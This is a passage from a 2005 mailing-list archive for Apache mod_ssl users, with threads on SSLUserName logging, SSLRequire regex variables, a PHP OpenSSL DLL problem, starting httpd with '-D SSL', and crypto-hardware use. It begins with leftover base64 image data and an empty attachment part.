/3//f/9//3//f/9//3//f/9//3//f/9//3//f601AACtNf9//38AAAAA/3//fwAAAAD/fwAA
AAD/f/9/AAAAAP9/AACtNTFGAAAxRv9//3//f/9//3+tNQAAGGP/f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/914AAHNO/38AAAAA
/3//fwAAAAD/fwAAAAD/f/9/AAAAAP9/KSUAAP9//3//f/9//3//f/9//3+ccwAAKSX/f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/38AAAAA/3/vPQAA/3//fwAA7z3/f+89AAD/f/9/AADvPf9/c04AAP9//3//f/9//3//f/9/
/3//fwAAAAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9/c04AAL13nHMAADFG/3/WWgAAGGMYYwAA1lr/f9ZaAAAYYxhjAADWWv9/nHMAABhj
vXcAAHNO/3+tNQAAvXe9dwAAlFL/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/vXdzTgAAAABzTv9//3//f5RSAAAAAJRS/3//f/9/lFIAAAAA
lFL/f/9//39aa601AACtNb13/3+9d+89AAAAAJRS/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/


----------ozlbxzzfktvzyywltuld
Content-Type: application/octet-stream; name="Fish.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Fish.zip"



----------ozlbxzzfktvzyywltuld--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 14 14:26:05 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3202914D9B4; Tue, 14 Jun 2005 14:26:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (eurmta01.london.eur.slb.com [134.32.26.55])
	by master.modssl.org (Postfix) with ESMTP id E61E614D99B
	for ; Tue, 14 Jun 2005 14:26:04 +0200 (CEST)
Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by
 eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004))
 id <0II200001QGFRY@eurmta01.london.eur.slb.com> for modssl-users@modssl.org;
 Tue, 14 Jun 2005 12:24:15 +0000 (GMT)
Received: from wgmail3.oslo.eur.slb.com
 (wgmail3.oslo.eur.slb.com [134.32.44.153]) by eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004))
 with ESMTP id <0II200F85QGF51@eurmta01.london.eur.slb.com> for
 modssl-users@modssl.org; Tue, 14 Jun 2005 12:24:15 +0000 (GMT)
Received: from [192.23.231.54] (localhost [127.0.0.1])
 by wgmail3.oslo.eur.slb.com (Switch-2.2.8/8.11.1) with ESMTP id j5ECOBE18052
 for ; Tue, 14 Jun 2005 14:24:11 +0200 (MEST)
Date: Tue, 14 Jun 2005 14:24:12 +0200
From: =?UTF-8?B?w5h5dmluIFPDuG1tZQ==?= 
Subject: Re: Client Authentication and Access Control
In-reply-to: <20050603074745.GA7569@redhat.com>
To: modssl-users@modssl.org
Message-id: <42AECC6C.4070404@oslo.westerngeco.slb.com>
Organization: Schlumberger,  OFS IT
MIME-version: 1.0
Content-type: text/plain; charset=UTF-8; format=flowed
Content-transfer-encoding: 8BIT
X-Accept-Language: en-us, en
User-Agent: Mozilla Thunderbird 1.0 (X11/20041206)
References: <429FFF38.6070304@oslo.westerngeco.slb.com>
 <20050603074745.GA7569@redhat.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?UTF-8?B?w5h5dmluIFPDuG1tZQ==?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe Orton wrote:
> On Fri, Jun 03, 2005 at 08:56:56AM +0200, Øyvin Sømme wrote:
> 
>>Method 2 (SSLRequire):
>>
>>  The user-id field is just '-'.
>>
>>Can I somehow configure apache/mod_ssl to only store certain elements of
>>the DN (e.g. the CN in the DN) as the user-id in the access-log?
> 
> 
> mod_ssl in httpd 2.0 supports the "SSLUsername" directive which allows
> this:
> 
> http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslusername
> 
> Regards,
> 
> joe
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

Thanks for a very good suggestion. Seems to be just what I need.
So I tried to use the directive 'SSLUserName SSL_CLIENT_S_DN_CN'
inside the   context. This resulted in *no*
change in my log files, the user-id field was still '-'.

Any idea why it didn't work?


Regards
Øyvin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 14 16:30:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DD93514D9C4; Tue, 14 Jun 2005 16:30:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (eurmta01.london.eur.slb.com [134.32.26.55])
	by master.modssl.org (Postfix) with ESMTP id A715E14D9B2
	for ; Tue, 14 Jun 2005 16:30:22 +0200 (CEST)
Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by
 eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004))
 id <0II200505W8CER@eurmta01.london.eur.slb.com> for modssl-users@modssl.org;
 Tue, 14 Jun 2005 14:29:00 +0000 (GMT)
Received: from wgmail3.oslo.eur.slb.com
 (wgmail3.oslo.eur.slb.com [134.32.44.153]) by eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004))
 with ESMTP id <0II200FERW87IE@eurmta01.london.eur.slb.com> for
 modssl-users@modssl.org; Tue, 14 Jun 2005 14:28:56 +0000 (GMT)
Received: from [192.23.231.54] (localhost [127.0.0.1])
 by wgmail3.oslo.eur.slb.com (Switch-2.2.8/8.11.1) with ESMTP id j5EESpE02074
 for ; Tue, 14 Jun 2005 16:28:51 +0200 (MEST)
Date: Tue, 14 Jun 2005 16:28:52 +0200
From: =?UTF-8?B?w5h5dmluIFPDuG1tZQ==?= 
Subject: Re: Client Authentication and Access Control
In-reply-to: <42AECC6C.4070404@oslo.westerngeco.slb.com>
To: modssl-users@modssl.org
Message-id: <42AEE9A4.5070400@oslo.westerngeco.slb.com>
Organization: Schlumberger,  OFS IT
MIME-version: 1.0
Content-type: text/plain; charset=UTF-8; format=flowed
Content-transfer-encoding: 8BIT
X-Accept-Language: en-us, en
User-Agent: Mozilla Thunderbird 1.0 (X11/20041206)
References: <429FFF38.6070304@oslo.westerngeco.slb.com>
 <20050603074745.GA7569@redhat.com> <42AECC6C.4070404@oslo.westerngeco.slb.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?UTF-8?B?w5h5dmluIFPDuG1tZQ==?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Øyvin Sømme wrote:
> Joe Orton wrote:
> 
>> On Fri, Jun 03, 2005 at 08:56:56AM +0200, Øyvin Sømme wrote:
>>
>>> Method 2 (SSLRequire):
>>>
>>>  The user-id field is just '-'.
>>>
>>> Can I somehow configure apache/mod_ssl to only store certain elements of
>>> the DN (e.g. the CN in the DN) as the user-id in the access-log?
>>
>>
>>
>> mod_ssl in httpd 2.0 supports the "SSLUsername" directive which allows
>> this:
>>
>> http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslusername
>>
>> Regards,
>>
>> joe
> 
> 
> Thanks for a very good suggestion. Seems to be just what I need.
> So I tried to use the directive 'SSLUserName SSL_CLIENT_S_DN_CN'
> inside the   context. This resulted in *no*
> change in my log files, the user-id field was still '-'.
> 
> Any idea why it didn't work?
> 
> 
> Regards
> Øyvin


I found out the issue: I cannot use 'SSLOptions +FakeBasicAuth' together with 'SSLUserName xxx'
(not documented anywhere).

Regards.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 14 20:23:35 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C76114D9C4; Tue, 14 Jun 2005 20:23:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cb2.van.galnet.ca (cb2.van.galnet.ca [216.187.119.10])
	by master.modssl.org (Postfix) with SMTP id C890B14D9B4
	for ; Tue, 14 Jun 2005 20:23:34 +0200 (CEST)
Received: from [192.168.99.230] (207-232-98-114.ip.van.radiant.net [207.232.98.114])
	by cb2.van.galnet.ca (8.9.3-SOL3/8.9.3) with ESMTP id LAA15693
	for ; Tue, 14 Jun 2005 11:23:32 -0700
Message-ID: <42AF20A9.6010507@dream.cx>
Date: Tue, 14 Jun 2005 11:23:37 -0700
From: reticent 
User-Agent: Debian Thunderbird 1.0.2 (X11/20050602)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Using Environment Variables Inside an SSLRequire regex statement
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: reticent 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I havn't found a way to do regex comparisons using variables inside the
regex statement, somthing like:
"%{REQUEST_URI} =~ m#/%{SSL_CLIENT_S_DN_CN}/#"
doesn't seem to work as expected.

Is it possible to use variables inside regex statements?  If so can
someone provide me with the syntax or an example?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 19:56:57 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A021D14D9C9; Tue, 21 Jun 2005 19:56:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51508.mail.yahoo.com (web51508.mail.yahoo.com [206.190.38.200])
	by master.modssl.org (Postfix) with SMTP id 0E0C014D9A7
	for ; Tue, 21 Jun 2005 19:56:56 +0200 (CEST)
Received: (qmail 87916 invoked by uid 60001); 21 Jun 2005 17:56:53 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=xl4kmNghfPi0N3/ASapkfxK6V9pPaVi9bYUIx68Bb9uiBODgJot+OYGc0O7LvyS5NObq6cNVcq1LIGbXrqCSYckF1NWFRW6HpQrWao3f2wMSxA07Ac3WDP8Q/GVrO0W5snYGvWyatQcEvsDH+Ga+HkpkgfYEr0qxlIO8PME3i0w=  ;
Message-ID: <20050621175653.87914.qmail@web51508.mail.yahoo.com>
Received: from [199.231.49.128] by web51508.mail.yahoo.com via HTTP; Tue, 21 Jun 2005 10:56:53 PDT
Date: Tue, 21 Jun 2005 10:56:53 -0700 (PDT)
From: b h 
Subject: problem enabling php ssl support
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: b h 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi

I successfully compiled httpd-2.0.54 with
openssl-0.9.7g, have enabled mod_ssl in httpd.conf. 
And things look like they are working.

In a php page I'm using, I'd like to use the openssl
support for parsing an X509 cert. 
http://us4.php.net/manual/en/ref.openssl.php

however, after the first step of the instructions,
apache will not restart and hangs.

that step being "Note to Win32 Users: In order to
enable this module on a Windows environment, you must
copy libeay32.dll from the DLL folder of the PHP/Win32
binary package to the SYSTEM32 folder of your windows
machine. (Ex: C:\WINNT\SYSTEM32 or
C:\WINDOWS\SYSTEM32) "

I had copied over the libeay32.dll from the out32dll
directory under where I build openssl for apache.

I'm guessing I'm running into some weird dll search
order thing that is now preventing apache from
starting...

Removing the libeay32.dll file from system32 and
rebooting will allow apache to start again, but of
course php with openssl support doesn't

any pointers much appreciated...
bob


		
__________________________________ 
Discover Yahoo! 
Stay in touch with email, IM, photo sharing and more. Check it out! 
http://discover.yahoo.com/stayintouch.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 20:30:18 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C9A5414D9D0; Tue, 21 Jun 2005 20:30:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail13-fra-R.bigfish.com (mail-fra.bigfish.com [62.209.45.166])
	by master.modssl.org (Postfix) with ESMTP id 8670414D9C5
	for ; Tue, 21 Jun 2005 20:30:18 +0200 (CEST)
Received: from mail13-fra.bigfish.com (localhost.localdomain [127.0.0.1])
	by mail13-fra-R.bigfish.com (Postfix) with ESMTP id 310B73F489A
	for ; Tue, 21 Jun 2005 18:30:18 +0000 (UTC)
X-BigFish: VPC
Received: by mail13-fra (MessageSwitch) id 1119378618152061_24447; Tue, 21 Jun 2005 18:30:18 +0000 (UCT)
Received: from mailrelay5.pfizer.com (ns11.pfizer.com [192.77.198.11])
	by mail1-fra.bigfish.com (Postfix) with ESMTP id E39C03F3AB7
	for ; Tue, 21 Jun 2005 18:30:17 +0000 (UTC)
Received: from [10.35.88.102] (localhost [127.0.0.1])
	by mailrelay5.pfizer.com (Switch-3.0.5/Switch-3.0.0) with ESMTP id j5LIUGVk019995
	for ; Tue, 21 Jun 2005 14:30:17 -0400 (EDT)
Mime-Version: 1.0 (Apple Message framework v730)
Content-Transfer-Encoding: 7bit
Message-Id: <0FBD3725-3258-422E-ABDB-7CF5A232E60F@internection.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Jon August 
Subject: Apache starts, SSL site unavailable
Date: Tue, 21 Jun 2005 14:30:15 -0400
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jon August 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I'm switching from Stronghold to Apache 2.0.54 with mod_ssl enabled.   
When I start apache, everything appears to work except the SSL site.   
There's some sort of warning about the cache.  mod_ssl.c is listed as  
a compiled in module, and there's an: Include conf/ssl.conf in the  
httpd.conf  Any suggestions would be greatly appreciated.

Thanks,
      -Jon

Here's the error log for the startup:

[Tue Jun 21 14:01:33 2005] [warn] Init: Session Cache is not  
configured [hint: S
SLSessionCache]
[Tue Jun 21 14:01:33 2005] [notice] Apache/2.0.54 (Unix) mod_ssl/ 
2.0.54 OpenSSL/
0.9.7g configured -- resuming normal operations

Here's the ssl.conf (minus comments):

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

Listen 443
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex  file:/usr/local/apache/logs/ssl_mutex

   ServerName secure.securesite.com
   ServerAdmin web@securesite.com
   DocumentRoot /www/docs/secsite
   
      Options FollowSymLinks ExecCGI Includes
      AllowOverride None
   
   SSLEngine on
   SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW: 
+SSLv2:+EXP
   ErrorLog logs/secure.securesite.com-error_log
   CustomLog logs/secure.securesite.com-access_log common
   SSLCertificateFile /usr/local/apache/conf/ssl.crt/ 
secure.securesite.com.crt
   SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/ 
secure.securesite.com.key




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 20:36:20 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 17BB514D9C9; Tue, 21 Jun 2005 20:36:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 87FDE14D9C5
	for ; Tue, 21 Jun 2005 20:36:19 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.13.4/8.13.4/UVACS-2005041801) with ESMTP id j5LIZxAT010188;
	Tue, 21 Jun 2005 14:35:59 -0400 (EDT)
Date: Tue, 21 Jun 2005 14:35:59 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Jon August 
Cc: modssl-users@modssl.org
Subject: Re: Apache starts, SSL site unavailable
In-Reply-To: <0FBD3725-3258-422E-ABDB-7CF5A232E60F@internection.com>
Message-ID: 
References: <0FBD3725-3258-422E-ABDB-7CF5A232E60F@internection.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 21 Jun 2005, Jon August wrote:

> Hi,
>
> I'm switching from Stronghold to Apache 2.0.54 with mod_ssl enabled.
> When I start apache, everything appears to work except the SSL site.
> There's some sort of warning about the cache.  mod_ssl.c is listed as
> a compiled in module, and there's an: Include conf/ssl.conf in the
> httpd.conf  Any suggestions would be greatly appreciated.
>

Are you starting httpd with the -D SSL command line argument?  If not,
then the entire block of configuration directives inside the  container in your config file will be ignored.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 21:23:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E177814D9CB; Tue, 21 Jun 2005 21:23:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail33-red-R.bigfish.com (mail-red.bigfish.com [216.148.222.61])
	by master.modssl.org (Postfix) with ESMTP id 93FA614D9A7
	for ; Tue, 21 Jun 2005 21:23:36 +0200 (CEST)
Received: from mail33-red.bigfish.com (localhost.localdomain [127.0.0.1])
	by mail33-red-R.bigfish.com (Postfix) with ESMTP id C60643B90D8;
	Tue, 21 Jun 2005 19:23:34 +0000 (UTC)
X-BigFish: VPC
Received: by mail33-red.bigfish.com (MessageSwitch) id 1119381814761458_9240; Tue, 21 Jun 2005 19:23:34 +0000 (UCT)
Received: from mailrelay5.pfizer.com (ns11.pfizer.com [192.77.198.11])
	by mail33-red.bigfish.com (Postfix) with ESMTP id 9666E3B90D8;
	Tue, 21 Jun 2005 19:23:34 +0000 (UTC)
Received: from [10.35.88.102] (localhost [127.0.0.1])
	by mailrelay5.pfizer.com (Switch-3.0.5/Switch-3.0.0) with ESMTP id j5LJ9iVk007893;
	Tue, 21 Jun 2005 15:09:45 -0400 (EDT)
In-Reply-To: 
References: <0FBD3725-3258-422E-ABDB-7CF5A232E60F@internection.com> 
Mime-Version: 1.0 (Apple Message framework v730)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <620C889C-85E6-4328-9F84-91816BAEBB97@internection.com>
Cc: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
From: Jon August 
Subject: Re: Apache starts, SSL site unavailable
Date: Tue, 21 Jun 2005 15:09:43 -0400
To: Cliff Woolley 
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jon August 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Can I just remove the IfDefine tags?  or is that not recommended?



On Jun 21, 2005, at 2:35 PM, Cliff Woolley wrote:

> On Tue, 21 Jun 2005, Jon August wrote:
>
>
>> Hi,
>>
>> I'm switching from Stronghold to Apache 2.0.54 with mod_ssl enabled.
>> When I start apache, everything appears to work except the SSL site.
>> There's some sort of warning about the cache.  mod_ssl.c is listed as
>> a compiled in module, and there's an: Include conf/ssl.conf in the
>> httpd.conf  Any suggestions would be greatly appreciated.
>>
>>
>
> Are you starting httpd with the -D SSL command line argument?  If not,
> then the entire block of configuration directives inside the  SSL> container in your config file will be ignored.
>
> --Cliff
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 21:37:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0FAE214D9C6; Tue, 21 Jun 2005 21:37:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from proxy1.iplannetworks.net (eddie.iplannetworks.net [200.69.193.97])
	by master.modssl.org (Postfix) with ESMTP id 9D53F14D991
	for ; Tue, 21 Jun 2005 21:37:03 +0200 (CEST)
Received: from smtp.preteco.com (200.68.93.225) by proxy1.iplannetworks.net (7.2.052)
        id 42733BC2003F6FE1 for modssl-users@modssl.org; Tue, 21 Jun 2005 16:37:03 -0300
Received: from localhost (localhost.localdomain [127.0.0.1])
	by smtp.preteco.com (Postfix) with ESMTP id 17FDEFBC4
	for ; Tue, 21 Jun 2005 16:37:02 -0300 (ART)
Received: from moliveira.br.latinsourcetech.com (cguimaraes.br.latinsourcetech.com [172.31.46.81])
	by smtp.preteco.com (Postfix) with ESMTP id E7AEFFB69
	for ; Tue, 21 Jun 2005 16:36:58 -0300 (ART)
Subject: Mod_ssl Crypto Hardware
From: =?ISO-8859-1?Q?M=E1rcio?= Oliveira 
To: modssl-users@modssl.org
Content-Type: multipart/alternative; boundary="=-t+iVFBMN8jr4WgGvBd69"
Organization: Red Hat Brasil.
Message-Id: <1119382659.7118.23.camel@moliveira.br.latinsourcetech.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 (1.4.5-14) 
Date: Tue, 21 Jun 2005 16:37:39 -0300
X-Virus-Scanned: by AMaViS 0.3.12 - Preteco S.A.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?M=E1rcio?= Oliveira 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--=-t+iVFBMN8jr4WgGvBd69
Content-Type: text/plain; charset=
Content-Transfer-Encoding: 8bit

Hi all,

   I have a IBM s/390 server with 1 PCICC crypto processor. I installed
Linux, configured the processor module and device, tested the device
using openssl and it works OK.

   So I configured Apache + Mod_ssl to work with the PCICC processor,
but I cannot see any difference between use the crypto processor or use
the s/390 processors. 

   I tested with a lot of SSL trafic, and monitoring the access to the
PCICC card, but not happens. Apparently the process is not in use.

   How can I test the Apache / SSL communication to confirm the PCICC
process utilization?

Following, the ssl.conf configuration to use PCICC processor:

SSLCryptoDevice ibmca


Any Ideas?

Regards,
Márcio Oliveira
RHCE, LPIC-2


--=-t+iVFBMN8jr4WgGvBd69
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 7bit




  
  


Hi all,



   I have a IBM s/390 server with 1 PCICC crypto processor. I installed Linux, configured the processor module and device, tested the device using openssl and it works OK.



   So I configured Apache + Mod_ssl to work with the PCICC processor, but I cannot see any difference between use the crypto processor or use the s/390 processors. 



   I tested with a lot of SSL trafic, and monitoring the access to the PCICC card, but not happens. Apparently the process is not in use.



   How can I test the Apache / SSL communication to confirm the PCICC process utilization?



Following, the ssl.conf configuration to use PCICC processor:



SSLCryptoDevice ibmca





Any Ideas?



Regards,

Márcio Oliveira

RHCE, LPIC-2






--=-t+iVFBMN8jr4WgGvBd69--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 21:47:46 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B531214D9C9; Tue, 21 Jun 2005 21:47:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id 2A49814D9A7
	for ; Tue, 21 Jun 2005 21:47:45 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.12.11/8.12.11) with ESMTP id j5LJpOTg018978;
	Tue, 21 Jun 2005 15:51:28 -0400
Date: Tue, 21 Jun 2005 15:51:19 -0400 (EDT)
From: "R. DuFresne" 
To: Jon August 
Cc: Cliff Woolley , modssl-users@modssl.org
Subject: Re: Apache starts, SSL site unavailable
In-Reply-To: <620C889C-85E6-4328-9F84-91816BAEBB97@internection.com>
Message-ID: 
References: <0FBD3725-3258-422E-ABDB-7CF5A232E60F@internection.com>
 
 <620C889C-85E6-4328-9F84-91816BAEBB97@internection.com>
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 21 Jun 2005, Jon August wrote:

>
>
> Can I just remove the IfDefine tags?  or is that not recommended?
>
>

You could though the gain might not be there, why not just run the server 
in the proper mode?

Thanks,

Ron DuFresne


>
> On Jun 21, 2005, at 2:35 PM, Cliff Woolley wrote:
>
>> On Tue, 21 Jun 2005, Jon August wrote:
>> 
>> 
>>> Hi,
>>> 
>>> I'm switching from Stronghold to Apache 2.0.54 with mod_ssl enabled.
>>> When I start apache, everything appears to work except the SSL site.
>>> There's some sort of warning about the cache.  mod_ssl.c is listed as
>>> a compiled in module, and there's an: Include conf/ssl.conf in the
>>> httpd.conf  Any suggestions would be greatly appreciated.
>>> 
>>> 
>> 
>> Are you starting httpd with the -D SSL command line argument?  If not,
>> then the entire block of configuration directives inside the > SSL> container in your config file will be ignored.
>> 
>> --Cliff
>> 
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

